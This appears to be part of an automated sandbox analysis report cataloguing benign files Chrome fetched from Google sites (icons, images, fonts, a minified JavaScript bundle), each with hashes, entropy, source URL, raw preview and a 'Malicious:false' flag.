                                                                                                                                                                                                                                                                                          MD5:46AB5AFE6A2D26878159AAE0842452F6
                                                                                                                                                                                                                                                                                          SHA1:5E55793EACC00FD735EC2BC156CBFCED792DCCA4
                                                                                                                                                                                                                                                                                          SHA-256:66A5489982598046CDCDABAFD4C5681DFC5E4AF5B1259DA934401CCAB087122D
                                                                                                                                                                                                                                                                                          SHA-512:10AD7F45E7D879DEAD37974789BA2C248A61DDB1D92202FD04858F86C1949C29BBE9C1BDEB578DFF67E77DC9CB89843AB1FE9B2DC02E86D4728699E45ED5E734
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/marketing-cms/assets/images/6b/3b/a160b27b4d8aa6f63fd4910afd19/vector-5.svg
                                                                                                                                                                                                                                                                                          Preview:<svg width="40" height="28" viewBox="0 0 40 28" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M6.66667 5.66675C6.66667 4.75008 7.41667 4.00008 8.33333 4.00008H35C35.9167 4.00008 36.6667 3.25008 36.6667 2.33341C36.6667 1.41675 35.9167 0.666748 35 0.666748H6.66667C4.83333 0.666748 3.33333 2.16675 3.33333 4.00008V22.3334H2.5C1.11667 22.3334 0 23.4501 0 24.8334C0 26.2167 1.11667 27.3334 2.5 27.3334H23.3333V22.3334H6.66667V5.66675ZM38.3333 7.33341H28.3333C27.4167 7.33341 26.6667 8.08341 26.6667 9.00008V25.6667C26.6667 26.5834 27.4167 27.3334 28.3333 27.3334H38.3333C39.25 27.3334 40 26.5834 40 25.6667V9.00008C40 8.08341 39.25 7.33341 38.3333 7.33341ZM36.6667 22.3334H30V10.6667H36.6667V22.3334Z" fill="#202124"/>.</svg>.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (523)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):1312
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.318433518103831
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:jZO5avW+bJos0We6gZO5/J3sSV2JkvHsZFMkOtVmhURvYFinA/WbnA/Wfu9m4dkt:YwOUisvtnnwWvc8DmKRRnAebnAefuHlI
                                                                                                                                                                                                                                                                                          MD5:E3B58D779853888418A1D0367FB04208
                                                                                                                                                                                                                                                                                          SHA1:732ED77448D80A2FAB9446104755D4C99741580D
                                                                                                                                                                                                                                                                                          SHA-256:BF064460A823B22DF1EE85EE6F2602181E7E8F56C501F7D2CCC13FE0ECBCAB55
                                                                                                                                                                                                                                                                                          SHA-512:027E122F644EEDD120DDFB27E2C68B2E11C246CE7D95F0768D5AD537A3A1F155FAD959FDAD178DCCEC45B6B92B786C68F716760D155DE479B25381EC16FAC089
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/search/howsearchworks/assets/0XPwTFcg.min.js
                                                                                                                                                                                                                                                                                          Preview:/**. * @license. * Copyright 2017 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. */const a=e=>n=>typeof n=="function"?((t,o)=>(customElements.define(t,o),o))(e,n):((t,o)=>{const{kind:r,elements:i}=o;return{kind:r,elements:i,finisher(l){customElements.define(t,l)}}})(e,n);/**. * @license. * Copyright 2017 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. */const u=({finisher:e,descriptor:n})=>(t,o)=>{var r;if(o===void 0){const i=(r=t.originalKey)!==null&&r!==void 0?r:t.key,l=n!=null?{kind:"method",placement:"prototype",key:i,descriptor:n(t.key)}:{...t,key:i};return e!=null&&(l.finisher=function(s){e(s,i)}),l}{const i=t.constructor;n!==void 0&&Object.defineProperty(t,o,n(o)),e?.(i,o)}};/**. * @license. * Copyright 2021 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. */var d;const m=((d=window.HTMLSlotElement)===null||d===void 0?void 0:d.prototype.assignedElements)!=null?(e,n)=>e.assignedElements(n):(e,n)=>e.assignedNodes(n).filter(t=>t.nodeType===Node.ELEMENT_NODE);function
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):2860
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.879156635175711
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:fjQksA6iEpeC9On0wvRNbqvGI4NY6+ifbUr9VIiDj47Bj82rLtvGDzt3gZ9ptxll:fjQO6VPCFqeI4NY6+Jn47Bje2RPN
                                                                                                                                                                                                                                                                                          MD5:FB458CB44A816F8CB363B60DB753F71E
                                                                                                                                                                                                                                                                                          SHA1:F3AABDB35D06026CF13E72D2118B3FA81FC06FE2
                                                                                                                                                                                                                                                                                          SHA-256:FCEC976891ABCE6C4E0C4636FE4FC4F19137C73B4434C24D1AA7FF3CF3B20468
                                                                                                                                                                                                                                                                                          SHA-512:6851B77E81DC158E201E3DAD2DAB781ECAA17AB179DA47F31E7CC3733CFA730CDC4D04A4898CB6C95BF5C5B72A4DBE1691493565CD4C3E7841ECDEB296EC7B38
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/XfxlbB7Imi28_w277XeVC0u8Yngn8e1bQxhd6YK2snOdqt_uiwripgSEl5VNxgS2cJP2kf0dHv6LfSq8AG6YeJf9cpu1BE1kP36R=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d.....IDATx..yl.....7{..C..$\../..CB..R.$..PZT...CCiAEEH@..*..@."..ZP)..%.I...*m.....D.AU...^...{..a;..Y.....|$_.~...|.y.fv...........u.a.v.0....J.f.............8F..~.+..)l.`o..Rf...@.C.]Z4..t.../.+.X..........-bg>....y...h...A.'S._'._.6.`0R..s...."Y..U).h....@.E.#.3.@..5... .@.Q'......?.;.bzD.T.1.`..6......!......:.YF....y..3....=r..S....+.]...4.]......\.Xb...:.j.}.\.>.TN...V.!...K,"..L...U.L..R.|..8..O..+([..(x..j-qr....oR...8..-...-..i..=.R....J.O..\...8.<2..l0..H....n..mj ?.&..c....>...J..V...i........3.u.(.X.`.....%.o0..5.j.j.6.....N.;.|.....<!....;Y:..5....h.{.....Zr. .)..G.....Y3....V..b~R$..i......u....u.)....u.d.]x..V.....x2....4...+.|.5.....M.{?.t].......l.e6...KY.B.........<.h..N.AXM.&!:.....^.-/..i......|O;<...J_.7...3B5........`k.oY..ijzB/\|.e..j.I.L..._.0OzC..o..~v%.].2+.<....X..u..q..............\<.v...Z......\..R=..H...[-9J.<#R..5..{..iV....P......f.....C.$H.fBfw..}...qI.YM....^^.Y
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 53 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1865
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.874337098668318
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:IMfQdzkH2XmI15W7zuPjJTOghHL54kCnfxULS:CedI5OEUghHV4DpU2
                                                                                                                                                                                                                                                                                          MD5:A57D6C00F4409AA03C70AAEBEE22F3BA
                                                                                                                                                                                                                                                                                          SHA1:289ADD8817967A2139DFCF26A5AE32EC8761F494
                                                                                                                                                                                                                                                                                          SHA-256:4B79D02CCF23A38AFA7FF65F1C76C56F59C953B0B33CEE21F6E53FA034CECC71
                                                                                                                                                                                                                                                                                          SHA-512:6502A48C7A3D5236AEDCB452F8582F9833B0C86AA46074F8DD858A9B883822474010E1B2179D82F1990C464ACC4BB4E7F37F3B7B9AC7CED6B9C07BF0127A4668
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...5...0......+2.....sBIT....|.d.....IDATh..{pTg....w.nBH.....I/. ...`.eFkG.h......J.8u: RP..a.2c)..H.".#A...d..T.1MH.-....6. .K.{......u.{..3>3..9......wy.].?.\I..Z.Q;[.L.-..........^...u...X]...a~.0Oa...T.GU.a...Tqm...f.I)...:..o(?...PM..}....M@~...ZO.n.X..1...%8.~....L.G...#4S..{ ..........[....).?e.......|...o......PL.O..==_.f.D.>f|..L.dlJ.S...+G:G`..vD....2...T.n7j{..O..a3!....bdu&...2b.V5..F.*.........m....4........f;P].."..3\W..#....i.r<.7....#R..[.z...x..NjH..P#....@..T....K.\..r.T...b..H....|..o(?.NR..z.7....e..|[..X1......tG..v.IiWw.;.d."V.....ez.QN...gbu.g...V.............G.?a..>6.~..X>..;..SY...,....g./...4...].jp.U{v.O.<8\..2.....{...vCt^lN..T"......d..u.J..~.....}..&..[.."...k..d.)..g..E&.Z]1D..a9....m.......1\..v..Q]..._]Js.kUO.[%.S..h..6.L.....8.E .A..>.4v;w..$.G.P..j...I......P..<.##.f..)...|H......|b..CV9.."..2S..........=.g..\e.,.x..A..i*..U.*S.....=.~.....NtzVVW.`o.5..1...FX...y,W/....!FV..m......z~..j
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2718
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.880291072349662
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:mbgJeNEkhZEXQmJ46VJrAJ8cjig5oTK3FvXNnLj9TM7aFXGxVbI7sti:mbyCOQmJ4mE8cH5o21vhd/M+
                                                                                                                                                                                                                                                                                          MD5:35D265D275688C64B4EADC82DCF95AC9
                                                                                                                                                                                                                                                                                          SHA1:1C678D990EE7B755F1C6EEF1F9409CB76450C620
                                                                                                                                                                                                                                                                                          SHA-256:0E41E36790294DE89ABCEE52F8682F393C704D474F4960A5255536BF8823F1C8
                                                                                                                                                                                                                                                                                          SHA-512:C1F98E199EEDCB06A9AF7B7C5025CAABFBC2449B2F0FA814A8A8FC7C203E935D02D9481C6DD72341B2B1E459245AF3C66E98942F124CF8AC133719A6E5B79D38
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d....UIDATx...}p.........KxIHHC.D."/A.`+.....H[...P(..:..3..`u.Vf.....u....$Bx.2L...wF.H.)p.TH$... ...>O.......gow...3.=........=.(..(..(..(..(.......4<.f....{`.d$.. b..!8.P..Y.b.`.....\N.U..B.......!.!Y.....".U...d9.0..N.....# r...-..l.zVJ.......2...#..H..:.,.....(u.<cn....rD[.......!..%.....#..<..._~...!.._...;..G........g.=f<.....=.......Y..}..Le....>.9i..7.......0](... .}X!..6n...n.........>..g...8.v..@.x.6.].v.L.g..#....K^......'>/Bws../..#...,..Gt...?....-.=S....w.....?......^..O......7/f....?qq..^.S.Of.8...k....iy9[....,.......l......n'H...._.....v.z.y....._p;BZ^...........iy9[......v0....1=..._0...q;B/^........p;B/^.../...m.q....TO..s....Z...#|.KY....W.<..X2.Ox......N0c..1..5X_....)...`... .HW.M..[.y.+..?38%Tv.-.m..W...m.<jF^.....f`...mT......F.CA....L.((..u#.9.1.......J..S..........q.01,y..w.)..w...H.Zh76W.:......u.......Hk.y,..`.~` .....|.E.S...<.0.....X`.@k.y.....W...6U........*...\.@..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Picasa], baseline, precision 8, 120x120, components 3
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):7124
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.565676034080946
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:t6MT0D5MdtbZPAVwzVwmSA2UJWhzEd+GVG5n8oCWciGeqqVpFeQiN9/6/SX:XYNMtKwZwUJWx9nJCW/t2B8aX
                                                                                                                                                                                                                                                                                          MD5:347536242E2AEB5CB09672220066D45F
                                                                                                                                                                                                                                                                                          SHA1:002AE7E5866BE9904702A7DFC9BBAD74DA8C25D5
                                                                                                                                                                                                                                                                                          SHA-256:C9DD166FEB248045ACF61FCEFECA21CC42ECB37CF0753F16B1DEB2731AE5E677
                                                                                                                                                                                                                                                                                          SHA-512:1A6FEA037A534F5759D6B6C2A99FFD939EA04B3213474C74461E6BE7A13A53CE2E54614B8DA2DBA0621A86B143E315CF179D24B6F234DA32C34A9A46B2653A46
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/hDmpjNjn66Z7hyYvAee18jZfIss2NCbUss41HLkWh3s08AxT6prRWd6iv9CnofK6cXXS42OzQ_0J6UcM44xV1ouv2Tq53nCjI28DDorFDHS4RQrICw=h120
                                                                                                                                                                                                                                                                                          Preview:......JFIF.............*Exif..II*.......1...............Picasa......ICC_PROFILE...............mntrRGB XYZ .........$..acsp.......................................-....).=..U.xB...9.................................desc...D...ybXYZ........bTRC........dmdd........gXYZ...h....gTRC........lumi...|....meas.......$bkpt........rXYZ........rTRC........tech........vued........wtpt...p....cprt.......7chad.......,desc........sRGB IEC61966-2-1 black scaled..................................................................................XYZ ......$.........curv.......................#.(.-.2.7.;.@.E.J.O.T.Y.^.c.h.m.r.w.|...............................................................%.+.2.8.>.E.L.R.Y.`.g.n.u.|.........................................&./.8.A.K.T.].g.q.z...............................!.-.8.C.O.Z.f.r.~......................... .-.;.H.U.c.q.~.......................+.:.I.X.g.w.....................'.7.H.Y.j.{...................+.=.O.a.t...................2.F.Z.n.................%.:.O.d.y..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 35060, version 1.0
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):35060
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9934247518702914
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:768:VWgzOJq8VMlI+d620JaSUhkJN1tLmkLqnEsKeeBClx7styedpa12:dSJBVMlfd6VJaSUCv1RmkavKetUXnZ
                                                                                                                                                                                                                                                                                          MD5:0360DBC6E8C09DCE9183A1FD78F3BE2E
                                                                                                                                                                                                                                                                                          SHA1:6CD4B65A94707AE941D78B12F082C968CB05EC92
                                                                                                                                                                                                                                                                                          SHA-256:2DB6BC36808D43FA89029C652636E206FA3E889B35ECF71814AB85F8BA944AF3
                                                                                                                                                                                                                                                                                          SHA-512:93C9F1856142DA0709F807CA3E5836065E61BC8160F9281FEC9244F31ED8AE8DF500CD5C64048AC59B4DBC36EBD18BA8E7FBCEEF58134DD76441079FAE147AB9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://fonts.gstatic.com/s/productsans/v19/pxiDypQkot1TnFhsFMOfGShVF9eO.woff2
                                                                                                                                                                                                                                                                                          Preview:wOF2..............u$..............................T....`..P.l..a.....D..;.."......6.$..@. ..,..6...[.]q..}:P..(....W.(........(;h 8..r.o...........k..........>..eZT\K.....4l..Z]...1B.1.G.....|..p..._..S/...^I.e..l.=.I1...0..L./..D..Y{.w...*.(.....Q..J....v.........z......Q/.K..f._...-..T.f...[..U.).>.K35v...n.?-thr......w.?[D.u.Q.}..i_.cp..0E.R5m.>I.......x......H."C,....2...q...E..r.?...R../.J..m..X97...E.fJ...=.Q.>..`.QXuw..e."........\^.....~....>M.....h.Q.-.......SM,;W......#..#.B.....K.o...`...z...t....".$..s....o.v...w.I.mg.$n....../...N.....8H........^.~....X.Q.,YB.U...uX.e.o.l..o.2f..^_].~.3w*........J$2)_.c8...&^.>...r.29.D&.I....T".H....O.2.$..r.\...1.}.ES~5...t.X`.x.gQk..e.L.N......{.6...4..G.....2.z...V...Vy.'..../.....'...z..i.G.......`...$@.k......1.....{PH.....qf......_...A.e..7.....C.?.^.....,......NDa<b..*F...:.....+..|.._I+.2.^......l...3..^.)qJ...0.....X.....yj....J"...lo..._j...Z...0...m..2.$.EBa.....w...|..2&!.$..!S/^'..*...r.U-.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):5430
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.6534652184263736
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:wIJct3xIAxG/7nvWDtZcdYLtX7B6QXL3aqG8Q:wIJct+A47v+rcqlBPG9B
                                                                                                                                                                                                                                                                                          MD5:F3418A443E7D841097C714D69EC4BCB8
                                                                                                                                                                                                                                                                                          SHA1:49263695F6B0CDD72F45CF1B775E660FDC36C606
                                                                                                                                                                                                                                                                                          SHA-256:6DA5620880159634213E197FAFCA1DDE0272153BE3E4590818533FAB8D040770
                                                                                                                                                                                                                                                                                          SHA-512:82D017C4B7EC8E0C46E8B75DA0CA6A52FD8BCE7FCF4E556CBDF16B49FC81BE9953FE7E25A05F63ECD41C7272E8BB0A9FD9AEDF0AC06CB6032330B096B3702563
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/gmail/about/static-2.0/images/favicon.ico?fingerprint=913d48cd5d48ba34313131f246f99d6b
                                                                                                                                                                                                                                                                                          Preview:............ .h...&... .... .........(....... ..... ............................................0...................................................................................................................................v.].X.:.X.:.r.Y........................................q.X.S.4.S.4.S.4.S.4.S.4.S.4...X....................0........q.W.S.4.X.:.................J...A...g.........................K.H.V.8..........................F..B.....................,.......................................B..............................................B..B..B..B..B...u..........................................B..B..B..B..B...{.................5.......k...........................................................7R..8F.................................................2........Vb..5C..;I..................R^.....................0................Xc..5C..5C..5C..5C..5C..5C..lv..........................................]i..<J..:G..Zf....................................................
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 553x371, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):28312
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.992927101794351
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:768:CzruHVxI3Sw12e3mcxvCw/H/uBwe7w4elkEC:CHuHVxICw0cxv9/H2x7blEC
                                                                                                                                                                                                                                                                                          MD5:91B424CCBA8F7448351AC276FB742803
                                                                                                                                                                                                                                                                                          SHA1:A258192257191445763FBA05D07BD55D9CD6E356
                                                                                                                                                                                                                                                                                          SHA-256:54DC2D07131CAD43F7041F43E1D78804731E3AB018BE87F1FF763502276DB9C4
                                                                                                                                                                                                                                                                                          SHA-512:A9FC8A06D12C5F71B07D2376BF884021BD943D58F2652115D93F2C123C88ACF7E2D6F0BCDF46E090876FAA88652486640BA8A7F8E51200D80AEB56CABFD4720C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFF.n..WEBPVP8 .n..p....*).s.>E .D..!.)..(.D.._5w......>.Y.....y..?]...}....?5....K...........|~........a.....k.....P.....}.?k.......9.j.............U.%.$.......x.`.G........Q..e_Uz....o...~...........b........._...}fw.\.A.u>..;....?......_..p/..?.............{..D...;...........~....../.......?....G.C.......tO.......;..jG.M..........G|u...9 .'..E..s.2g...c.?6...G.8..3z.&_o.=I.W..k..|.o.?!Q.:......-..O..j)...;....g..8..\.wIr....`.1.1v.m..G..B5.....yH.Vs.._..o8......q.....%.=.~B..[2:g.9..."S.:D_..B/.e.~cd.64....YtM....Bh?.W+._a8.4...*+.5v.&..8...XJ.c|S....).U..9....G_...#....Q..|.$.E..Z.K........{xnP.7_.Z........Y9.7..]....K.}...b..L.....nsb.R......i.|a_;?....Eu'.|?.......l..F(|..}%.M.F|.:.x...\.).fh.w@eQ..#jV.......:fa..D|@...L%:..M.lb~........I....0....5.......E~H......R..v]w.^..u..=......F.-.R.Z.~..{L."/......C!....9.i.(....u.....K.:.-.F. MVZ..Ovc.......{]....E.1J..............K.u..i....a,..8...F(O+..C...\.w.&?EX.+._.q.{.......B+.....b...6j.)..Q.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 9852, version 1.0
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):9852
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.976858458981679
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:a0yi9/omJNLjeCSLFkrrtJt8vvOVOR83DooJlyiWY2SlOdcnrOs:2i9/oaeDF6tjVORW8q4i7OdKL
                                                                                                                                                                                                                                                                                          MD5:3BC33669E3BEDDA403E81398B92D9040
                                                                                                                                                                                                                                                                                          SHA1:7B7FA6C2199234D8905445EBA6A8DA92676BA8CE
                                                                                                                                                                                                                                                                                          SHA-256:4D539033909DD344AE868F1C72BD0FC3D5EE082C9A76882448849481FD8ED857
                                                                                                                                                                                                                                                                                          SHA-512:F3487DE9A5D58BEEA15863480C118BE64BC1005D0818973506C07F222A7E81895202F95225BBFEE5C0E4DE8A77D3D6048384D91226222B097E00CCBAC3853C01
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu5mxKOzY.woff2
                                                                                                                                                                                                                                                                                          Preview:wOF2......&|......Z\..&..........................v..x....`..6.T..<.....(.c........6.$..4. ..t. ..I..P.....q....-..2B.H..q.......R.(..n..WL..d.....~q.........Vkih.y......4W..6.@ p.6..D.g.NlV..{(.Kvz..R..=.(.C...:...]W..B=Bc..]....7.Iv...A.:`[.......W4?..MP!"F.a.a.F...V!h.Q.Qy....U......p.."../1..........y....^..b_ a...d........_|..=".*xYAym0.........`=....^...(..@...R.b.k..o.w)....@.5Z`..S.K..Z.A....F....m...[%.I.<...........~..E.&V"...:i...G7.z..P.M.4.Y7~7V.^N.U[uK...5.....`........|....x~5..p....vjD....8.h..EU.J.....7..=..v.2IG9.u.../..P..!........Z7IW\.\..Z.+......M....`.f.....0....f.....8m.e..:..\.E...zvd...=..Z.........C_....B....q..........4M..v'.C.".!.!wYyvl.....-...*..QT....h.C...{..=......q.C.aN.g..g.....3..t....{81.L.(..W........&G...FM}..m)96.~p.W.}n.nt...c.@m_bC... ..)><AVk3..8j......M9..1S?-..&ql.....wI...Q.V..Y.8:y..W......c.]E.E;.\...s....r`9.EMKg.l.... ....a.%I..l....-M&...S$.O^.........@z........]....j.f.....S.6.FNm....gsC..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 512 x 384, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):312061
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.981383487988184
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:N1k8JCW7sSJuh4N2cX/iDkBOncmLOkAeWnVv/6buLcrs8IuUl:Nu8JCYTJuh4NFPiDzcMH4nl/LLDpuA
                                                                                                                                                                                                                                                                                          MD5:D90E1FA816B988782E1E652A3C34913A
                                                                                                                                                                                                                                                                                          SHA1:8C49BBB1DC243C2347998A4966CC43B4A208BDB8
                                                                                                                                                                                                                                                                                          SHA-256:CFCCF134704E895D13AE760062B37C3A435D951A8007BBEBAB88ED01B7AA53C4
                                                                                                                                                                                                                                                                                          SHA-512:809B9F325723FECE912B5180003D16CCBD88495859C47A82EC8325F64BDACFF26A5E5A57241C5ACE5C099F080C2B7CB30E67698DED4995B4A848B7497DDE4649
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.............TBM.....pHYs................IDATx...Y.$K.&.}".j./....zzz....\.q.r_H...........H.|.3..lU.U....pw[TE........T5g.zUeE......~"..F.............N.... '.........2s8. LBN...'".... ".!..ww.C...Kp\9."`....ALp.3.@|..63.3.D....u.L.afv.......(D0s.....0......."P..|.%....7..D..@f.......x.FL..F.0...#..."8........3...'.8...sj.CUW..D0.........6...wGb..q......n.r.f.>.........Y..h.u..W.{.....{.W.W........|...m....yY............N...>..x...9..l........bf.......B..8)...E1...x..N................n....y._....y..0.`Y.....7..}.$.K.Z...e......w.`....p......q.........n.*.31.$..G..T..s.....j..&.R.9...L0#...H..]O...OOOD8..k......H"...("e.A0.RJ.jf......$.sz......|..t..7...I(...'/.W..8H..YI...A..0s7....@.Cl..V.5h%.W.-.XBf....n...g..D.....7.qr.`.... ..8.;yCM..[.....d.. .W...9^.5(.sAhPJm..M..".)....l.3.S..@qr..i..8..C..z/..m..9n..-..md.d..oH.._.............=..b.!-..bj...!.....v.....n.&\.C........,s.#..D..7GD.g....BV.=.=....-N........u...$.] ......
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1080x579, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):85526
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.997611898119701
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:1536:lVtgW+bAAj0WqzFRulBf9ZhHHFr6MoEVSq2zqENE0tdFbIz1uu:lVi7b7QPzFRQ9Zhn96/YAztdFcJp
                                                                                                                                                                                                                                                                                          MD5:A318FA1B9B7C281E6AEB43E14E3A2FE3
                                                                                                                                                                                                                                                                                          SHA1:0FD7F40338B61AA283FDC4DBE6957E90B20C3A92
                                                                                                                                                                                                                                                                                          SHA-256:AD63C60C0B8CAE070DF10460D93DA9D66C2E7100A1D7E9E6EF826CE0F3450E92
                                                                                                                                                                                                                                                                                          SHA-512:A5B26E6CDD858E8861686B462B9A1AFC2B87E92307D314E7CCC8627F3AF4FD50062F838C8578B1D460D3F92D16A36A77A7BEE28159F227EA597D6D7D74962D99
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFF.N..WEBPVP8 .N.......*8.C.>m2.G.#"#.......ej..v,.rw.P..+..G. ...A.......G.....oqw...5.....z.s......._.8{g.../.r..C....O_;...8._.....w..7....?.........n..;...........O...|........?.{............|...(/....%...of..~.z.r..3.C...o.Og......>...7.\.~.@...j.Xb#..R.W.l.:G..W....RvnX.P)..D............@.).^..1..6.."e#U.o.3<.p.-....$'..3....}y...7.X....5.l.P...R.|.c.72...9f`(..e...J...ZD...."F.a.m..~2..nL.gp.o...n.%.k....XE..W...!.e.Q...7....~...W...c....F...f6..c{3`.....E.*.h....x9.g....7.3..3...H.c.%....Y..pq._=F.~.Q....R....p.9......WOP.6F..;.l.D.\./.......Kb.d.K.N.......H..........e..~.@v...&.g.*.<.Jjp<....>i..H^.*.....q[....\g.+..b.<..]..o.%e.o......z.#w.Lv.(..@N.C.$.*...SH..s......../...z.........p,../.....)pG...|...%"..|....k.+O....d.~...Y}.....;.....p.}.g..!..9....Cw./..Oqd.<U.6...y.k`..L.z....b....._.e.....M..L... ......O..@..).BR_O..[.P#...aD...5..QJ.vg.l.1...'....Zjr.....:.X..Y...Z.#r..8......W...b./`......-.1C....$9.V2TWp..S......M).w.k.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (5945)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):260521
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.570057089157707
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:5sVpmFU77li04d7G3BsEemvegNpH0fxnQF:u+W774nhiky
                                                                                                                                                                                                                                                                                          MD5:3F8B6C1F57CF8A6CF7FA173B75AB383A
                                                                                                                                                                                                                                                                                          SHA1:F1D9E33D17A4ACAB6A95E6A48FE476514C68221C
                                                                                                                                                                                                                                                                                          SHA-256:54CCE5B197794B7C4EFC330B210D4419571EA36EFE59EBFBDDDB3D5AFA586D08
